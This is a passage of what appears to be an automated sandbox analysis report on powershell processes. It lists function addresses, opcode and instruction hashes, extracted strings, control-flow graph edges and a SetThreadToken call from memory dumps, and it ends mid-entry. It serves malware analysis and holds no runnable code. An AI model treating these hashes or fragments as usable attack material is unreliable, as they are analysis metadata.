                                                              • Instruction Fuzzy Hash: 9221ADF3E182508BE702173C4C1215EBB60DF52B24F884AE5C820AB2E3D7248A12C3A3
                                                              Function 033EF02C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2135475418.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_33ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 532b5606fcf9e2d28f8349e1fdee5f99ecb3b8dc3319a7949445824eef93c62c
                                                              • Instruction ID: 103cff6f38e734ec8f7abb47a801f0bb1fbfe51c848e7c1433c8dc7c9f94fcb5
                                                              • Opcode Fuzzy Hash: 532b5606fcf9e2d28f8349e1fdee5f99ecb3b8dc3319a7949445824eef93c62c
                                                              • Instruction Fuzzy Hash: BC210475604244DFCB14DF24D9C0B26BFA9FB88315F24C6ADD9094B296C3BED846CA61
                                                              Function 07B128E6 Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8a6d6fd91e259b0dc4ca80c252a6c9bc2ce1b1e20d9b5689e7395a5ab777356a
                                                              • Instruction ID: 64d0c72f2736653e07cf50d8bccf4fc05fe801d61c22fbcc460ca978e6ea89e6
                                                              • Opcode Fuzzy Hash: 8a6d6fd91e259b0dc4ca80c252a6c9bc2ce1b1e20d9b5689e7395a5ab777356a
                                                              • Instruction Fuzzy Hash: 5311BFF1B1020ADFEB24CF5CC580BAAB7E1FB45261F8481F6DA088B211D731D945CBA5
                                                              Function 033EF3D3 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2135475418.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_33ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                              • Instruction ID: e8ecc2a8672b89d973031c4393234d6801fff6f8379e359e628d5c878cea67f8
                                                              • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                              • Instruction Fuzzy Hash: CD219076508240DFCF06CF10D9C4B15BF72FB48314F28C5A9D9494A656C33AD45ACF91
                                                              Function 033EF027 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2135475418.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_33ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                                              • Instruction ID: a01e54adbc582b33039f253d39b61cf3e1be0de82ffdd2db645e8329ab724a40
                                                              • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                                              • Instruction Fuzzy Hash: DD11D075504280CFCB11CF14D9C4B15FF61FB44314F28C6A9D8494B696C37AD84ACB61
                                                              Function 033ED01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2135475418.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_33ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae52b81d58a2e778b0fc57a0569eac23c5acecfca37ef6bce782f589f652da60
                                                              • Instruction ID: 9ef97d77002c50e1ac0d84de7f10316c4e4ae311fbb99f9b799bf43b0d5c3d9e
                                                              • Opcode Fuzzy Hash: ae52b81d58a2e778b0fc57a0569eac23c5acecfca37ef6bce782f589f652da60
                                                              • Instruction Fuzzy Hash: B701F271404354AEE720CA29CDC4B67FF9CEF46325F1CC46AED580A686C27D9C42CAB1
                                                              Function 033ED006 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2135475418.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_33ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04f19ee5bae7aac2dbd16683866bd9b92492403828f572da5a38e310136a4923
                                                              • Instruction ID: 36f37b89c1fa0a6da98be1dae0b95585a3dc3e80a5c04c048263f498ed0a5204
                                                              • Opcode Fuzzy Hash: 04f19ee5bae7aac2dbd16683866bd9b92492403828f572da5a38e310136a4923
                                                              • Instruction Fuzzy Hash: CB01927100E3C09ED7128B25CC94B52BFB8EF47224F0D80CBD8888F2A3C2699844C772
                                                              Function 033ED8D3 Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2135475418.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_33ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc12bf5b67c77babf1f85735d0ec05741d9c15a89fb000d03df7824935a86046
                                                              • Instruction ID: 21bfb2bd9cc040cac14ed86cff2e7d9fe18091e773a8f049f517dbda4b4630a0
                                                              • Opcode Fuzzy Hash: bc12bf5b67c77babf1f85735d0ec05741d9c15a89fb000d03df7824935a86046
                                                              • Instruction Fuzzy Hash: CAF0E776600650AF9720CF0AD984C23FBADEFD4670319C55AE84A4B666C671EC42CAA0
                                                              Function 033ED8C4 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2135475418.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_33ed000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c880a324b5cfe436118d1c6fc5d1105898c312998ae1b73482942d5e59d6915
                                                              • Instruction ID: 5f3d310cf082a7748714bf43b539eb621370782282fcb0846fa6aea87eafbbba
                                                              • Opcode Fuzzy Hash: 1c880a324b5cfe436118d1c6fc5d1105898c312998ae1b73482942d5e59d6915
                                                              • Instruction Fuzzy Hash: F4F0F975100680AFD725CF06CD84D23BBB9EB99624B198489F85A5B762C631FC42CF60

                                                              Non-executed Functions

                                                              Function 07B11BE0 Relevance: 20.4, Strings: 16, Instructions: 394COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$84#l$84#l$pij$tPjq$tPjq$J&l$J&l$J&l$J&l$J&l$r%l$r%l
                                                              • API String ID: 0-2481791253
                                                              • Opcode ID: 02b3e006969a0729e9448a677330cead251784f8dd56b373296b585cebad5892
                                                              • Instruction ID: ea25aa1a62d795860f532b9484359e9495d1426d4b4c39f4d256079fe6fd57ed
                                                              • Opcode Fuzzy Hash: 02b3e006969a0729e9448a677330cead251784f8dd56b373296b585cebad5892
                                                              • Instruction Fuzzy Hash: D7D116B1B0421E8FDB258B6C94146ABFBA6EF85210F58C0FACA45CB255DB31C846C7A1
                                                              Function 07B10FB8 Relevance: 12.7, Strings: 10, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foq$84#l$`Qjq$`Qjq$tPjq$$jq$$jq$$jq$$jq$$jq
                                                              • API String ID: 0-2352571334
                                                              • Opcode ID: 3fbb80b556d52d0ec37cf959a461f16674aaddf6e9504df205d37098187f7fc1
                                                              • Instruction ID: 3d6cdfa27539d335ca8e237eab4e1d3152b6b9b3c7309092c3ff819942a04d85
                                                              • Opcode Fuzzy Hash: 3fbb80b556d52d0ec37cf959a461f16674aaddf6e9504df205d37098187f7fc1
                                                              • Instruction Fuzzy Hash: 2E619AF0A1420EDFEB24CE4CC544BAAB7B2FB45351F9580E5EA019B294C775DD90CBA1
                                                              Function 07B15798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jq$$jq$$jq$$jq
                                                              • API String ID: 0-2428501249
                                                              • Opcode ID: 82a962a65741b72d1367036e3e6dea8228b8aa3aa9cc95b46a2ce971a765fa31
                                                              • Instruction ID: a342bf499b6ef5ff2e90803d811f1ed8967a4d5c852dd0ca4b6b25eaa3e37ace
                                                              • Opcode Fuzzy Hash: 82a962a65741b72d1367036e3e6dea8228b8aa3aa9cc95b46a2ce971a765fa31
                                                              • Instruction Fuzzy Hash: 9E2177F13143069FFB345A2A8805727B7DBEFC1711FA484BAA909CB781DD75C8618361
                                                              Function 07B1030A Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$$jq$$jq
                                                              • API String ID: 0-1496060811
                                                              • Opcode ID: 20aab223bd90933d90d6ffa7ea3081ed077dcf9cef02df036b7c052aedda8f76
                                                              • Instruction ID: dbcbb47f854e7dbd1282e12db41ac8bc74f2347418041cc4c6002e742ba186de
                                                              • Opcode Fuzzy Hash: 20aab223bd90933d90d6ffa7ea3081ed077dcf9cef02df036b7c052aedda8f76
                                                              • Instruction Fuzzy Hash: F501F7A170D3D64FD727223868201A6AFB69FC756075A40DBC441DF2D7C9194D46C3A7
                                                              Function 07B12107 Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2161157054.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7b10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jq$$jq$J&l$J&l
                                                              • API String ID: 0-4245329873
                                                              • Opcode ID: 6a934a074131b80dcca8eeb553864af899da4941edd6213ca96bee2da58f450c
                                                              • Instruction ID: 805b4ba7851aaf4c558f4bb73c1b3896421c9e5d0fd20e31256ff8156dbcdbf8
                                                              • Opcode Fuzzy Hash: 6a934a074131b80dcca8eeb553864af899da4941edd6213ca96bee2da58f450c
                                                              • Instruction Fuzzy Hash: 1101FCB671D3815FD322C6188D201D2BF66FF83610B5A45EBCAC4AF556C5394C0AC3A6

                                                              Execution Graph

                                                              Execution Coverage:5.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph 21442 8ad6658 21443 8ad669b SetThreadToken 21442->21443 21444 8ad66c9 21443->21444

                                                              Executed Functions

                                                              Function 04A6B470 Relevance: .3, Instructions: 265COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 876 4a6b470-4a6b4a9 878 4a6b4ae-4a6b7e9 call 4a6acbc 876->878 879 4a6b4ab 876->879 940 4a6b7ee-4a6b7f5 878->940 879->878
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ed8f28c11a62ad7d1a082606abfc9a05847bc537859c65b353f9e7da23651d9
                                                              • Instruction ID: 8ecdda623134a96347f51bbddbc079ccd5b3e0df28c22c085b717d02816e4283
                                                              • Opcode Fuzzy Hash: 2ed8f28c11a62ad7d1a082606abfc9a05847bc537859c65b353f9e7da23651d9
                                                              • Instruction Fuzzy Hash: 6B915F74B007145BEB19DFF495109AEBBE2EFC4600B00C92AD146BB364DF35AE058BD5
                                                              Function 04A6B490 Relevance: .3, Instructions: 252COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 941 4a6b490-4a6b4a9 942 4a6b4ae-4a6b7e9 call 4a6acbc 941->942 943 4a6b4ab 941->943 1004 4a6b7ee-4a6b7f5 942->1004 943->942
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d7ee7620d9f9f91fda9291a825187bb4de7147f93552e57c9e0beb768351f52
                                                              • Instruction ID: 255c5c4281b01cb84e8c90932c8645d4be340b3207bad7bf9ff55445ecf9e495
                                                              • Opcode Fuzzy Hash: 2d7ee7620d9f9f91fda9291a825187bb4de7147f93552e57c9e0beb768351f52
                                                              • Instruction Fuzzy Hash: 72913D74B006145BEB19EBF49910AAFB7E6EFC4600B008929D146BB354DF35AE058BD5
                                                              Function 077D26D9 Relevance: 14.6, Strings: 11, Instructions: 841COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$tPjq$tPjq$$jq$$jq$$jq
                                                              • API String ID: 0-4160460389
                                                              • Opcode ID: 2f8327ff1d23312b2054eccdc49ff137d1efc95d93d3e89ea3937e06095b331f
                                                              • Instruction ID: 5b861c61cc073ac535680190a9141ec406e2d03b07ac504e8a5e11a4bd77ac91
                                                              • Opcode Fuzzy Hash: 2f8327ff1d23312b2054eccdc49ff137d1efc95d93d3e89ea3937e06095b331f
                                                              • Instruction Fuzzy Hash: 13526AB17043069FC7219B68881176AFBF6FF86351F1488BAD905DF292DA35CC46C7A2
                                                              Function 077D3CE8 Relevance: 5.6, Strings: 4, Instructions: 581COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 262 77d3ce8-77d3d0d 263 77d3f00-77d3f16 262->263 264 77d3d13-77d3d18 262->264 272 77d3f1f-77d3f4a 263->272 273 77d3f18-77d3f1e 263->273 265 77d3d1a-77d3d20 264->265 266 77d3d30-77d3d34 264->266 268 77d3d24-77d3d2e 265->268 269 77d3d22 265->269 270 77d3d3a-77d3d3c 266->270 271 77d3eb0-77d3eba 266->271 268->266 269->266 276 77d3d4c 270->276 277 77d3d3e-77d3d4a 270->277 274 77d3ebc-77d3ec5 271->274 275 77d3ec8-77d3ece 271->275 279 77d40ce-77d40de 272->279 280 77d3f50-77d3f55 272->280 273->272 281 77d3ed4-77d3ee0 275->281 282 77d3ed0-77d3ed2 275->282 278 77d3d4e-77d3d50 276->278 277->278 278->271 284 77d3d56-77d3d75 278->284 294 77d40e7-77d4112 279->294 295 77d40e0-77d40e6 279->295 285 77d3f6d-77d3f71 280->285 286 77d3f57-77d3f5d 280->286 287 77d3ee2-77d3efd 281->287 282->287 317 77d3d85 284->317 318 77d3d77-77d3d83 284->318 288 77d3f77-77d3f79 285->288 289 77d4080-77d408a 285->289 290 77d3f5f 286->290 291 77d3f61-77d3f6b 286->291 296 77d3f89 288->296 297 77d3f7b-77d3f87 288->297 298 77d408c-77d4094 289->298 299 77d4097-77d409d 289->299 290->285 291->285 302 77d4228-77d425d 294->302 303 77d4118-77d411d 294->303 295->294 304 77d3f8b-77d3f8d 296->304 297->304 305 77d409f-77d40a1 299->305 306 77d40a3-77d40af 299->306 327 77d425f-77d4281 302->327 328 77d428b-77d4295 302->328 308 77d411f-77d4125 303->308 309 77d4135-77d4139 303->309 304->289 311 77d3f93-77d3fb2 304->311 312 77d40b1-77d40cb 305->312 306->312 314 77d4129-77d4133 308->314 315 77d4127 308->315 319 77d413f-77d4141 309->319 320 77d41da-77d41e4 309->320 348 77d3fb4-77d3fc0 311->348 349 77d3fc2 311->349 314->309 315->309 323 77d3d87-77d3d89 317->323 318->323 324 77d4151 319->324 325 77d4143-77d414f 319->325 329 77d41e6-77d41ee 320->329 330 77d41f1-77d41f7 320->330 323->271 334 77d3d8f-77d3d96 323->334 335 77d4153-77d4155 324->335 325->335 370 77d42d5-77d42fe 327->370 371 77d4283-77d4288 327->371 331 77d429f-77d42a5 328->331 332 77d4297-77d429c 328->332 336 77d41fd-77d4209 330->336 337 77d41f9-77d41fb 330->337 338 77d42ab-77d42b7 331->338 339 77d42a7-77d42a9 331->339 334->263 341 77d3d9c-77d3da1 334->341 335->320 344 77d415b-77d415d 335->344 345 77d420b-77d4225 336->345 337->345 347 77d42b9-77d42d2 338->347 339->347 350 77d3db9-77d3dc8 341->350 351 77d3da3-77d3da9 341->351 352 77d415f-77d4165 344->352 353 77d4177-77d417e 344->353 358 77d3fc4-77d3fc6 348->358 349->358 350->271 374 77d3dce-77d3dec 350->374 359 77d3dad-77d3db7 351->359 360 77d3dab 351->360 362 77d4169-77d4175 352->362 363 77d4167 352->363 355 77d4196-77d41d7 353->355 356 77d4180-77d4186 353->356 365 77d4188 356->365 366 77d418a-77d4194 356->366 358->289 369 77d3fcc-77d4003 358->369 359->350 360->350 362->353 363->353 365->355 366->355 389 77d401d-77d4024 369->389 390 77d4005-77d400b 369->390 383 77d432d-77d433e 370->383 384 77d4300-77d4326 370->384 374->271 387 77d3df2-77d3e17 374->387 396 77d4347-77d435c 383->396 397 77d4340-77d4346 383->397 384->383 387->271 413 77d3e1d-77d3e24 387->413 394 77d403c-77d407d 389->394 395 77d4026-77d402c 389->395 392 77d400d 390->392 393 77d400f-77d401b 390->393 392->389 393->389 401 77d402e 395->401 402 77d4030-77d403a 395->402 403 77d435e-77d437b 396->403 404 77d4395-77d439f 396->404 397->396 401->394 402->394 415 77d437d-77d438f 403->415 416 77d43e5-77d43ea 403->416 405 77d43a8-77d43ae 404->405 406 77d43a1-77d43a5 404->406 409 77d43b4-77d43c0 405->409 410 77d43b0-77d43b2 405->410 414 77d43c2-77d43e2 409->414 410->414 417 77d3e6a-77d3e9d 413->417 418 77d3e26-77d3e41 413->418 415->404 416->415 433 77d3ea4-77d3ead 417->433 424 77d3e5b-77d3e5f 418->424 425 77d3e43-77d3e49 418->425 430 77d3e66-77d3e68 424->430 426 77d3e4d-77d3e59 425->426 427 77d3e4b 425->427 426->424 427->424 430->433
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$4'jq$4'jq
                                                              • API String ID: 0-4000621977
                                                              • Opcode ID: eb8d3ba9b00ddca8679310f6cd83ddd3cb8b8f0d69227965d35444e39f4b9c38
                                                              • Instruction ID: 9ab73829a3cb15289219a4f833a0b103899ec84cd1a2515cd51d10f8e87d788e
                                                              • Opcode Fuzzy Hash: eb8d3ba9b00ddca8679310f6cd83ddd3cb8b8f0d69227965d35444e39f4b9c38
                                                              • Instruction Fuzzy Hash: BB1268B1B04245DFCB159B68C81176BFFB2AF82250F1488AAD905DF291DB32DC55CBA2
                                                              Function 08AD6652 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 437 8ad6652-8ad6693 438 8ad669b-8ad66c7 SetThreadToken 437->438 439 8ad66c9-8ad66cf 438->439 440 8ad66d0-8ad66ed 438->440 439->440
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2225913875.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_8ad0000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ThreadToken
                                                              • String ID:
                                                              • API String ID: 3254676861-0
                                                              • Opcode ID: 096a1c8b5fea12d18fced9109482c5b1e082da7fdce551b522f262905bee0cb0
                                                              • Instruction ID: 96ba5115c3f8b47d2c0c49eca5913542bb0520d644888a7558d7749737659b8c
                                                              • Opcode Fuzzy Hash: 096a1c8b5fea12d18fced9109482c5b1e082da7fdce551b522f262905bee0cb0
                                                              • Instruction Fuzzy Hash: D41113B59007498FCB10DFAAC984B9EBFF8EF49320F24845AD519A7250C778A944CFA5
                                                              Function 08AD6658 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 443 8ad6658-8ad66c7 SetThreadToken 445 8ad66c9-8ad66cf 443->445 446 8ad66d0-8ad66ed 443->446 445->446
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2225913875.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_8ad0000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ThreadToken
                                                              • String ID:
                                                              • API String ID: 3254676861-0
                                                              • Opcode ID: e9a0f765d16634c6cb3069902b0fcdd10092ea88580e3a444b224e434919d209
                                                              • Instruction ID: ce12b8166a646cf27aa8958b3bff7f719028d099a3586a604144abc35ed7d8a2
                                                              • Opcode Fuzzy Hash: e9a0f765d16634c6cb3069902b0fcdd10092ea88580e3a444b224e434919d209
                                                              • Instruction Fuzzy Hash: 8D11F5B59003488FCB10DF9AC945B9EFBF8EF48320F14845AD519A7750C778A944CFA5
                                                              Function 04A66FC8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 449 4a66fc8-4a66fe7 450 4a670ed-4a6712b 449->450 451 4a66fed-4a66ff0 449->451 479 4a66ff2 call 4a67664 451->479 480 4a66ff2 call 4a6767f 451->480 453 4a66ff8-4a6700a 454 4a67016-4a6702b 453->454 455 4a6700c 453->455 461 4a670b6-4a670cf 454->461 462 4a67031-4a67041 454->462 455->454 466 4a670d1 461->466 467 4a670da-4a670db 461->467 463 4a67043 462->463 464 4a6704d-4a6705b call 4a6bf10 462->464 463->464 471 4a67061-4a67065 464->471 466->467 467->450 472 4a67067-4a67077 471->472 473 4a670a5-4a670b0 471->473 474 4a67093-4a6709d 472->474 475 4a67079-4a67091 472->475 473->461 473->462 474->473 475->473 479->453 480->453
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nq
                                                              • API String ID: 0-2756854522
                                                              • Opcode ID: 100f9f9db21d1a4b391f7502455058bece9fd517a011bb95345ddc2edf2d9062
                                                              • Instruction ID: b4283a071f707f6ab2abcbdfa37037f99b230b7533e93dfde706fcce9c0d3087
                                                              • Opcode Fuzzy Hash: 100f9f9db21d1a4b391f7502455058bece9fd517a011bb95345ddc2edf2d9062
                                                              • Instruction Fuzzy Hash: 18414B38B142048FDB04DFA8C568AAEBBF1EF8D315F154099D506EB391DA35EC01CB60
                                                              Function 04A6AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 481 4a6af98-4a6af9f 482 4a6afa6-4a6afaa 481->482 483 4a6afa1 call 4a6a984 481->483 484 4a6afac-4a6afb9 482->484 485 4a6afba-4a6b055 482->485 483->482 492 4a6b057-4a6b05d 485->492 493 4a6b05e-4a6b07b 485->493 492->493
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (&jq
                                                              • API String ID: 0-3222446104
                                                              • Opcode ID: c87cc60c5da601ec992936e48a1a79447b796603e2280ffb8bde04751c8faca2
                                                              • Instruction ID: f067875894d24b653407b9f2776ad1963f29951dccbd279f415f0ea27362ed0d
                                                              • Opcode Fuzzy Hash: c87cc60c5da601ec992936e48a1a79447b796603e2280ffb8bde04751c8faca2
                                                              • Instruction Fuzzy Hash: A921DE71A042588FCB14DFAED504AAFBFF5EF89320F24846AD509E7340CA34A805CBA5
                                                              Function 04A629F0 Relevance: .2, Instructions: 207COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1005 4a629f0-4a62a1e 1006 4a62a24-4a62a3a 1005->1006 1007 4a62af5-4a62b37 1005->1007 1008 4a62a3f-4a62a52 1006->1008 1009 4a62a3c 1006->1009 1011 4a62c51-4a62c61 1007->1011 1012 4a62b3d-4a62b56 1007->1012 1008->1007 1017 4a62a58-4a62a65 1008->1017 1009->1008 1015 4a62b5b-4a62b69 1012->1015 1016 4a62b58 1012->1016 1015->1011 1022 4a62b6f-4a62b79 1015->1022 1016->1015 1020 4a62a67 1017->1020 1021 4a62a6a-4a62a7c 1017->1021 1020->1021 1021->1007 1027 4a62a7e-4a62a88 1021->1027 1023 4a62b87-4a62b94 1022->1023 1024 4a62b7b-4a62b7d 1022->1024 1023->1011 1026 4a62b9a-4a62baa 1023->1026 1024->1023 1028 4a62baf-4a62bbd 1026->1028 1029 4a62bac 1026->1029 1030 4a62a96-4a62aa6 1027->1030 1031 4a62a8a-4a62a8c 1027->1031 1028->1011 1036 4a62bc3-4a62bd3 1028->1036 1029->1028 1030->1007 1032 4a62aa8-4a62ab2 1030->1032 1031->1030 1034 4a62ab4-4a62ab6 1032->1034 1035 4a62ac0-4a62af4 1032->1035 1034->1035 1037 4a62bd5 1036->1037 1038 4a62bd8-4a62be5 1036->1038 1037->1038 1038->1011 1042 4a62be7-4a62bf7 1038->1042 1043 4a62bfc-4a62c08 1042->1043 1044 4a62bf9 1042->1044 1043->1011 1046 4a62c0a-4a62c1c 1043->1046 1044->1043 1048 4a62bf2-4a62bf7 1046->1048 1049 4a62c1e-4a62c24 1046->1049 1048->1043 1048->1044 1050 4a62c26 1049->1050 1051 4a62c29 1049->1051 1050->1051 1052 4a62c2e-4a62c38 1051->1052 1053 4a62c3d-4a62c50 1052->1053
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
